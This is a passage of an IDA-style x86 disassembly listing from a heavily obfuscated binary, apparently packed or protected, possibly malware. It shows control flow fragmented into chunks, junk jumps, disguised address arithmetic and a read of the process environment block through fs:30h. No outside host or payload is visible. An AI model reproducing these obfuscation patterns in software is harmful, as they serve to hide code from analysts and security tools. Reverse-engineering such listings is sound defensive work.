inc dword ptr [ebp-0Ch]
jmp loc_42836D
sub_42486B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424877 proc near ; CODE XREF: sub_428B28:loc_423279�j
; sub_426D17-3821�p ...
; FUNCTION CHUNK AT 0042464A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004265EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042792C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004288F3 SIZE 00000005 BYTES
push ebp
jmp loc_4288F3
sub_424877 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42487D: ; CODE XREF: hjohnhn9:00425C6C�j
jnb loc_4280AE
rol edx, 1Ch
jmp sub_4245BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_42488B: ; CODE XREF: sub_424819:loc_423EC7�j
jl loc_4273F5
; END OF FUNCTION CHUNK FOR sub_424819
; START OF FUNCTION CHUNK FOR sub_426C09
loc_424891: ; CODE XREF: sub_426C09+E�j
jmp loc_42361F
; END OF FUNCTION CHUNK FOR sub_426C09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42303E
loc_424896: ; CODE XREF: sub_42303E+C�j
jmp loc_427119
; END OF FUNCTION CHUNK FOR sub_42303E
; ---------------------------------------------------------------------------
jg loc_42756B
jmp loc_4273EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4263E3
loc_4248A6: ; CODE XREF: sub_4263E3+E�j
jz loc_426CA1
jmp loc_428A14
; END OF FUNCTION CHUNK FOR sub_4263E3
; =============== S U B R O U T I N E =======================================
sub_4248B1 proc near ; DATA XREF: sub_424161-102D�o
jnz loc_425FA3
call sub_424877
mov edx, 0B9726E5Ah
call sub_4279ED
call sub_428249
sub_4248B1 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_424A78
loc_4248CB: ; CODE XREF: sub_424A78+217A�j
jmp loc_4282EF
; END OF FUNCTION CHUNK FOR sub_424A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4264FA
loc_4248D0: ; CODE XREF: sub_4264FA+13�j
jmp nullsub_18
; END OF FUNCTION CHUNK FOR sub_4264FA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426E8C
loc_4248D5: ; CODE XREF: sub_426E8C:loc_426DD5�j
mov ecx, [ebx+ecx+0Ch]
or ecx, ecx
jz loc_425B24
call sub_426859
jnz loc_425B24
jmp loc_42804B
; END OF FUNCTION CHUNK FOR sub_426E8C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A30
loc_4248F1: ; CODE XREF: sub_426A30:loc_4247C1�j
mov ecx, [ebx+3Ch]
call sub_428E76
; END OF FUNCTION CHUNK FOR sub_426A30
; =============== S U B R O U T I N E =======================================
sub_4248F9 proc near ; CODE XREF: sub_4250FC:loc_4268DB�p
; hjohnhn9:00428CE2�j
xchg ebx, [esp+0]
pop ebx
pop ecx
pop ecx
jmp loc_427BB3
sub_4248F9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_424904: ; DATA XREF: sub_42351F+2�o
mov eax, large fs:30h
mov eax, [eax+0Ch]
call sub_426C48
; START OF FUNCTION CHUNK FOR sub_4266B5
loc_424913: ; CODE XREF: sub_4266B5:loc_426B04�j
call sub_42355C
loc_424918: ; CODE XREF: sub_428E65+C�j
jmp nullsub_72
; END OF FUNCTION CHUNK FOR sub_4266B5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428309
loc_42491D: ; CODE XREF: sub_428309+B�j
jmp nullsub_53
; END OF FUNCTION CHUNK FOR sub_428309
; ---------------------------------------------------------------------------
loc_424922: ; CODE XREF: hjohnhn9:0042701C�j
jo loc_4290DF
; =============== S U B R O U T I N E =======================================
sub_424928 proc near ; CODE XREF: sub_426BFD+7�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423984 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00428636 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00428696 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
xchg edx, [esp-4+arg_0]
push 5B23B617h
xchg edi, [esp+0]
mov esi, edi
pop edi
jmp loc_428636
sub_424928 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_83. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_19. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_424941: ; CODE XREF: hjohnhn9:00428935�j
jmp loc_427F09
; =============== S U B R O U T I N E =======================================
sub_424946 proc near ; CODE XREF: hjohnhn9:00426BCD�j
; sub_42325E:loc_428EBF�p
; FUNCTION CHUNK AT 004281EA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00429018 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
add ebx, ebp
add ebx, 0D9BF36A1h
mov ebx, [ebx]
loc_424954: ; CODE XREF: sub_4251EB+DFC�j
popf
add edx, ebx
jmp loc_429018
sub_424946 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test eax, 7427B536h
jmp loc_426CE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_424967: ; CODE XREF: sub_424819:loc_423394�j
pop eax
add eax, 5B709358h
rol eax, 1Eh
push offset sub_4283C9
jmp loc_4242E3
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_42497B: ; CODE XREF: sub_4260BD+228F�j
pop ebx
loc_42497C: ; CODE XREF: hjohnhn9:00425F73�j
cmp dword ptr [ebp-8], 0
jnz loc_42763E
jmp loc_426E4D
; ---------------------------------------------------------------------------
loc_42498B: ; CODE XREF: sub_4260BD-264D�j
mov [ebx], eax
pop ebx
xor eax, eax
push ebx
jmp loc_423CA1
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
loc_424996: ; DATA XREF: sub_425EEA-2067�o
cmp dword ptr [eax-1Ch], 0F7h
jnz loc_423F3D
; START OF FUNCTION CHUNK FOR sub_424631
loc_4249A3: ; CODE XREF: sub_424631+907�j
; sub_424631+2A7A�j ...
jb loc_428DD1
mov eax, [ebp+8]
test byte ptr [eax-10h], 38h
call sub_4281B9
loc_4249B5: ; CODE XREF: sub_42303E+40EA�j
jmp loc_425040
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
loc_4249BA: ; CODE XREF: hjohnhn9:00425BB3�j
jmp loc_42688E
; =============== S U B R O U T I N E =======================================
sub_4249BF proc near ; DATA XREF: sub_42472D�o
push ebx
mov ebx, ebp
push offset loc_42821A
jmp nullsub_10
sub_4249BF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4279C0
loc_4249CC: ; CODE XREF: sub_4279C0:loc_423D42�j
push edi
mov edi, ecx
xchg edi, [esp+4+var_4]
call sub_426A78
loc_4249D7: ; CODE XREF: sub_428F4A+9�j
jmp loc_425F5B
; END OF FUNCTION CHUNK FOR sub_4279C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231AD
loc_4249DC: ; CODE XREF: sub_4231AD+4DFD�j
jmp nullsub_46
; END OF FUNCTION CHUNK FOR sub_4231AD
; =============== S U B R O U T I N E =======================================
sub_4249E1 proc near ; CODE XREF: hjohnhn9:004246EF�p
; hjohnhn9:00428A23�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423EB7 SIZE 0000000A BYTES
xchg eax, [esp+0]
pop eax
xchg edi, [esp+0]
mov ecx, eax
xchg ecx, [esp+0]
jmp loc_423EB7
sub_4249E1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov ebp, 93E12E7Eh
jmp sub_426523
; ---------------------------------------------------------------------------
sub esi, 3FFC6C71h
jmp sub_428309
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851A
loc_424A07: ; CODE XREF: sub_42851A:loc_429107�j
cmp edx, 5259E0A8h
jmp loc_424E6B
; END OF FUNCTION CHUNK FOR sub_42851A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_424A12: ; CODE XREF: sub_4260BD+158B�j
jl loc_426D93
jmp loc_426325
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42897B
loc_424A1D: ; CODE XREF: sub_42897B-3A0A�j
mov eax, [ebp-8]
sub [ebp-0Ch], eax
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42897B
; =============== S U B R O U T I N E =======================================
sub_424A28 proc near ; CODE XREF: sub_423548+4�p sub_423F65�p
; FUNCTION CHUNK AT 00424824 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004276BB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427ACF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004284A7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042872F SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004289C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428EAA SIZE 00000015 BYTES
jnb loc_424824
jmp loc_42872F
sub_424A28 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_424A33: ; CODE XREF: sub_42304F+503B�j
push eax
jmp loc_4274F9
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4244F5
loc_424A39: ; CODE XREF: sub_4244F5+D�j
add esp, 8
mov eax, [eax]
add eax, [ebp-4]
jmp loc_4290DF
; END OF FUNCTION CHUNK FOR sub_4244F5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237F4
loc_424A46: ; CODE XREF: sub_4237F4:loc_423963�j
xor ecx, 49492E6Ch
pushf
rol ecx, 4
jmp loc_4243D4
; END OF FUNCTION CHUNK FOR sub_4237F4
; =============== S U B R O U T I N E =======================================
sub_424A55 proc near ; CODE XREF: sub_426287+3�j
; FUNCTION CHUNK AT 00424C81 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004286DD SIZE 00000009 BYTES
add esp, 0FFFFFFF8h
mov [ebp-4], eax
mov eax, [ebp-4]
loc_424A5E: ; CODE XREF: hjohnhn9:loc_427B6D�j
mov [ebp-8], eax
mov eax, [ebp+8]
test byte ptr [eax-8], 10h
jmp loc_4286DD
sub_424A55 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
and esi, eax
jmp sub_425E49
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_130. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_424A75: ; CODE XREF: hjohnhn9:004281E5�j
mov esi, [ebp+0]
; =============== S U B R O U T I N E =======================================
sub_424A78 proc near ; CODE XREF: sub_4234CA+4�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042380B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423FE9 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004242D9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004248CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424AA4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424C0C SIZE 0000003A BYTES
; FUNCTION CHUNK AT 00426BDF SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00426DAA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00427637 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00427800 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427984 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004282EF SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00428B8A SIZE 0000000E BYTES
xchg ecx, [esp+0]
pop ecx
call sub_424698
jmp loc_424C33
sub_424A78 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_49. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jnz loc_424F76
jmp loc_4271A9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F65
loc_424A92: ; CODE XREF: sub_423F65+1345�j
cmp ebp, 0A0055B9Fh
jmp loc_424F8B
; END OF FUNCTION CHUNK FOR sub_423F65
; =============== S U B R O U T I N E =======================================
sub_424A9D proc near ; DATA XREF: hjohnhn9:004266F3�o
push eax
call sub_4244F5
retn
sub_424A9D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A78
loc_424AA4: ; CODE XREF: sub_424A78+1C9�j
jmp loc_424C0C
; END OF FUNCTION CHUNK FOR sub_424A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4279ED
loc_424AA9: ; CODE XREF: sub_4279ED-3540�j
jmp nullsub_32
; END OF FUNCTION CHUNK FOR sub_4279ED
; =============== S U B R O U T I N E =======================================
sub_424AAE proc near ; CODE XREF: sub_426475-2F96�p
; sub_424335+4�p ...
mov eax, 54F79355h
locret_424AB3: ; CODE XREF: hjohnhn9:0042776A�j
retn
sub_424AAE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BD2
loc_424AB4: ; CODE XREF: sub_425BD2+174D�j
jmp loc_424E86
; END OF FUNCTION CHUNK FOR sub_425BD2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427564
loc_424AB9: ; CODE XREF: sub_427564:loc_42756B�j
call sub_424AAE
push 0B95E2A78h
pop edx
jmp loc_428B22
; END OF FUNCTION CHUNK FOR sub_427564
; ---------------------------------------------------------------------------
loc_424AC9: ; CODE XREF: hjohnhn9:00423972�j
push esi
; START OF FUNCTION CHUNK FOR sub_428477
loc_424ACA: ; CODE XREF: sub_428477:loc_42395D�j
and edx, 0AFC9BF05h
xor edx, 17C11FA5h
add edx, ebp
jmp loc_424CC8
; END OF FUNCTION CHUNK FOR sub_428477
; ---------------------------------------------------------------------------
locret_424ADD: ; CODE XREF: hjohnhn9:00423FB4�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_424ADE: ; CODE XREF: sub_4262C5-145F�j
jmp loc_423466
; END OF FUNCTION CHUNK FOR sub_4262C5
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424AE3 proc near ; CODE XREF: hjohnhn9:00423FAA�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ebx
mov ebx, ecx
xchg ebx, [esp+4+var_4]
loc_424AEC: ; CODE XREF: hjohnhn9:00424BE4�j
mov [ebp+var_4], eax
call sub_427E7B
jmp loc_424F48
sub_424AE3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4244F5
loc_424AF9: ; CODE XREF: sub_4244F5-2AF�j
push 82D50C2h
adc eax, esi
loc_424B00: ; CODE XREF: sub_4244F5:loc_424238�j
rol ecx, 12h
add ecx, 83F71552h
xchg ecx, [esp+4+var_4]
jmp loc_425E44
; END OF FUNCTION CHUNK FOR sub_4244F5
; ---------------------------------------------------------------------------
loc_424B11: ; CODE XREF: hjohnhn9:00425024�j
cmp eax, 5BF3FC7Eh
jmp loc_428626
; ---------------------------------------------------------------------------
loc_424B1C: ; CODE XREF: hjohnhn9:00427C52�j
; DATA XREF: sub_427C43�o
mov edx, 1
lock xchg edx, [eax]
or edx, edx
push offset sub_424EA4
jmp locret_427876
; =============== S U B R O U T I N E =======================================
sub_424B30 proc near ; CODE XREF: sub_424631-6F1�p
; hjohnhn9:00428D7B�j
xchg edi, [esp+0]
pop edi
mov [ebp-8], eax
mov eax, [ebp-8]
call sub_423655
loc_424B3F: ; CODE XREF: sub_423B05+913�j
jmp nullsub_11
sub_424B30 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_114. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_424B45: ; CODE XREF: sub_423B05+15�j
jmp loc_4230CE
; END OF FUNCTION CHUNK FOR sub_423B05
; =============== S U B R O U T I N E =======================================
sub_424B4A proc near ; DATA XREF: sub_426354+E�o
; FUNCTION CHUNK AT 0042666C SIZE 00000005 BYTES
jnz loc_426938
mov eax, 6
sub eax, [ebp-0Ch]
mov [ebp-0Ch], eax
jmp loc_42666C
sub_424B4A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_424B60: ; CODE XREF: sub_426354+4�j
cmp dword ptr [ebp-1Ch], 66h
jnz loc_426938
jmp loc_425EC5
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
loc_424B6F: ; CODE XREF: hjohnhn9:00423312�j
jz loc_42476D
jmp loc_4270CA
; ---------------------------------------------------------------------------
popf
jmp sub_427B7A
; ---------------------------------------------------------------------------
mov ebp, 849A51Eh
jmp sub_426C1C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42363F
loc_424B8A: ; CODE XREF: sub_42363F+1227�j
not ecx
cmp eax, 61EBB8C1h
jmp loc_427491
; END OF FUNCTION CHUNK FOR sub_42363F
; =============== S U B R O U T I N E =======================================
sub_424B97 proc near ; DATA XREF: hjohnhn9:00423998�o
; FUNCTION CHUNK AT 00424EBE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042741C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042829E SIZE 00000025 BYTES
mov esp, ebp
xchg edx, [esp+0]
push edx
pop ebp
jmp loc_424EBE
sub_424B97 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278DC
loc_424BA3: ; CODE XREF: sub_4278DC+7B9�j
jz loc_427B3C
jmp loc_424C01
; END OF FUNCTION CHUNK FOR sub_4278DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4236A7
loc_424BAE: ; CODE XREF: sub_4236A7+5986�j
jl loc_42706D
; END OF FUNCTION CHUNK FOR sub_4236A7
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_424BB4: ; CODE XREF: sub_423CDB:loc_42626A�j
jmp loc_426762
; END OF FUNCTION CHUNK FOR sub_423CDB
; ---------------------------------------------------------------------------
or edi, 86054EE6h
jnz loc_425CC2
and esi, edx
test eax, edx
jmp loc_428F2C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4263E3
loc_424BCE: ; CODE XREF: sub_4263E3:loc_4265E9�j
pop ebp
push offset sub_4262C2
jmp nullsub_112
; END OF FUNCTION CHUNK FOR sub_4263E3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_424BD9: ; CODE XREF: sub_42466E:loc_425D3D�j
jle loc_42476D
jmp loc_423BB8
; END OF FUNCTION CHUNK FOR sub_42466E
; ---------------------------------------------------------------------------
jg loc_424AEC
mov [ebp+0], ecx
jmp sub_424631
; ---------------------------------------------------------------------------
loc_424BF2: ; DATA XREF: sub_4279ED-3545�o
cmp dword ptr [ebp-4], 0
jz loc_4244EE
call sub_4289A4
; START OF FUNCTION CHUNK FOR sub_4278DC
loc_424C01: ; CODE XREF: sub_4278DC-2D33�j
jmp loc_423D54
; END OF FUNCTION CHUNK FOR sub_4278DC
; ---------------------------------------------------------------------------
cdq
jmp sub_42441D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A78
loc_424C0C: ; CODE XREF: sub_424A78:loc_424AA4�j
jz loc_426BDF
push ebp
mov eax, [ebp-20h]
call sub_423B6C
pop ecx
mov [ebp-20h], eax
jmp loc_4242D9
; ---------------------------------------------------------------------------
loc_424C24: ; CODE XREF: sub_424A78:loc_424C37�j
test byte ptr [ebp-7], 8
jz loc_426BDF
jmp loc_427800
; ---------------------------------------------------------------------------
loc_424C33: ; CODE XREF: sub_424A78+9�j
pop ecx
mov [ebp-20h], eax
loc_424C37: ; CODE XREF: sub_427B51+11�j
; sub_428162+D�j ...
jz loc_424C24
test byte ptr [ebp-7], 8
jmp loc_424AA4
; END OF FUNCTION CHUNK FOR sub_424A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237F4
loc_424C46: ; CODE XREF: sub_4237F4-401�j
; sub_424631:loc_4264F5�j
mov [edx-18h], eax
inc [ebp+var_4]
mov eax, [ebp+arg_0]
mov eax, [eax-18h]
and eax, 7
push offset loc_423DA8
jmp nullsub_40
; END OF FUNCTION CHUNK FOR sub_4237F4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424C5F proc near ; CODE XREF: sub_423F65+432C�p
; FUNCTION CHUNK AT 004263D8 SIZE 00000005 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
call sub_424EC9
loc_424C6A: ; DATA XREF: sub_425CB3+1BB2�o
push eax
push offset sub_4279C8
jmp loc_4263D8
sub_424C5F endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_22. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4279ED
loc_424C76: ; CODE XREF: sub_4279ED+15�j
jmp loc_4244A3
; END OF FUNCTION CHUNK FOR sub_4279ED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BC3
loc_424C7B: ; CODE XREF: sub_423BC3+3C76�j
jmp loc_42465F
; END OF FUNCTION CHUNK FOR sub_423BC3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_60. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A55
loc_424C81: ; CODE XREF: sub_424A55:loc_4286DD�j
mov eax, [ebp+8]
cmp dword ptr [eax-4], 4
jnz loc_424C97
add dword ptr [ebp-8], 4
jmp loc_4286E6
; ---------------------------------------------------------------------------
loc_424C97: ; CODE XREF: sub_424A55+233�j
add dword ptr [ebp-8], 2
jmp loc_426B92
; END OF FUNCTION CHUNK FOR sub_424A55
; ---------------------------------------------------------------------------
call sub_427324
; START OF FUNCTION CHUNK FOR sub_423CDB
loc_424CA5: ; CODE XREF: sub_423CDB+472C�j
jmp loc_428851
; END OF FUNCTION CHUNK FOR sub_423CDB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_424CAA: ; CODE XREF: sub_424631+1FFC�j
jmp loc_426535
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
loc_424CAF: ; CODE XREF: hjohnhn9:00424F15�j
and ebx, 6E04C0F0h
mov [ebp+0], edx
test ecx, ebx
jmp loc_427EF5
; ---------------------------------------------------------------------------
shr edx, 1Ah
popf
jmp sub_423655
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428477
loc_424CC8: ; CODE XREF: sub_428477-399F�j
add edx, 0C43ED46Bh
mov edx, [edx]
xchg edx, [esp+0]
loc_424CD3: ; CODE XREF: hjohnhn9:00423A8D�j
push [ebp+arg_4]
push eax
push 3F802B24h
jmp loc_424DE2
; END OF FUNCTION CHUNK FOR sub_428477
; ---------------------------------------------------------------------------
cmp edx, 42E40086h
jmp loc_426E86
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231AD
loc_424CEC: ; CODE XREF: sub_4231AD+3746�j
and ax, 38FFh
cmp ax, 20FFh
jz loc_427555
xor eax, eax
loc_424CFC: ; CODE XREF: sub_4231AD+43AA�j
mov [ebp-5], al
jmp loc_4265C8
; END OF FUNCTION CHUNK FOR sub_4231AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427AC0
loc_424D04: ; CODE XREF: sub_427AC0:loc_423B3E�j
jz loc_424705
xchg ebp, [edi]
jmp loc_424703
; END OF FUNCTION CHUNK FOR sub_427AC0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4250FC
loc_424D11: ; CODE XREF: sub_4250FC-1D98�j
pop eax
loc_424D12: ; CODE XREF: hjohnhn9:loc_4232F7�j
mov eax, 400h
push ecx
push 52D8C801h
xchg eax, [esp+0]
jmp loc_423114
; END OF FUNCTION CHUNK FOR sub_4250FC
; =============== S U B R O U T I N E =======================================
sub_424D25 proc near ; CODE XREF: hjohnhn9:00424385�j
; sub_427032:loc_42448C�p
xchg ecx, [esp+0]
pop ecx
cmp dword ptr [eax], 0FFFFFFFFh
mov ebx, [eax+4]
mov eax, [eax]
jnz loc_427039
retn
sub_424D25 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424D38 proc near ; CODE XREF: hjohnhn9:00423140�j
; sub_4244F5�p
; FUNCTION CHUNK AT 00423958 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428AAC SIZE 0000000F BYTES
xchg edx, [esp+0]
loc_424D3B: ; CODE XREF: hjohnhn9:00425116�j
pop edx
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp-4], eax
call nullsub_2
loc_424D4A: ; CODE XREF: sub_4250FC+1823�j
mov eax, [ebp-4]
jmp loc_428AAC
sub_424D38 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427486
loc_424D52: ; CODE XREF: sub_427486:loc_42721D�j
add eax, 0FB3E126Ch
push offset loc_427661
jmp loc_42850B
; END OF FUNCTION CHUNK FOR sub_427486
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_47. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851A
loc_424D63: ; CODE XREF: sub_42851A+3�j
jmp loc_428951
; END OF FUNCTION CHUNK FOR sub_42851A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_424D68: ; CODE XREF: sub_424161-F65�j
jmp loc_426C7F
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_424D6D: ; CODE XREF: sub_426354-475�j
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_4252DC[eax*4]
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jmp loc_4283BF
; END OF FUNCTION CHUNK FOR sub_426354
; ---------------------------------------------------------------------------
pushf
jmp sub_428945
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_424D8C: ; CODE XREF: sub_42304F:loc_426EF9�j
movzx eax, word ptr [eax]
push offset word_423E06
jmp loc_428F45
; END OF FUNCTION CHUNK FOR sub_42304F
; =============== S U B R O U T I N E =======================================
sub_424D99 proc near ; DATA XREF: sub_428CE7:loc_428E3C�o
; FUNCTION CHUNK AT 00423C1A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00423EF4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00424003 SIZE 00000005 BYTES
push 1EC7B0C3h
pop ebx
sub ebx, 961ABD41h
cmp ebx, 605F4E86h
jmp loc_424003
sub_424D99 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_424DB0: ; DATA XREF: sub_4275A3:loc_425CD2�o
add edx, 0A38B8F95h
add edx, ebp
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_424DB8: ; CODE XREF: sub_4260BD:loc_426D8C�j
add edx, 9FDC25DBh
mov [edx], eax
pop edx
jmp loc_4239D3
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
loc_424DC6: ; CODE XREF: hjohnhn9:loc_4268B3�j
inc ds:dword_4233C4
lea eax, nullsub_123
jmp loc_425FB1
; ---------------------------------------------------------------------------
loc_424DD7: ; DATA XREF: sub_4244F5:loc_42681D�o
push eax
push 0
push eax
mov eax, ebx
jmp loc_428E39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428477
loc_424DE2: ; CODE XREF: sub_428477-379B�j
xchg edx, [esp+0Ch+var_C]
mov eax, edx
pop edx
xor eax, ds:4000F6h
and eax, 7E3752A7h
xor eax, 0D8CB25EAh
or eax, 0D65B20F8h
jmp loc_4279E3
; END OF FUNCTION CHUNK FOR sub_428477
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424564
loc_424E05: ; CODE XREF: sub_424564:loc_42456D�j
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax]
cmp ds:dword_4252DC[eax*4], 0
jz loc_42755C
mov eax, [ebp+var_4]
loc_424E1C: ; CODE XREF: hjohnhn9:00426EA7�j
cmp byte ptr [eax], 0CFh
jmp loc_426547
; END OF FUNCTION CHUNK FOR sub_424564
; ---------------------------------------------------------------------------
dword_424E24 dd 1E6E8h, 0FC08400h, 1D884h, 0E57AE900h ; DATA XREF: sub_427E7B�o
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42392D
loc_424E36: ; CODE XREF: sub_42392D:loc_428AE8�j
mov [ebp-1], al
cmp byte ptr [ebp-1], 0
jz loc_428728
mov dword ptr [ebp-8], 1
jmp loc_4244E4
; END OF FUNCTION CHUNK FOR sub_42392D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424E4F proc near ; CODE XREF: sub_42392D�j
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
; FUNCTION CHUNK AT 004244D3 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042634F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004265B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428728 SIZE 00000007 BYTES
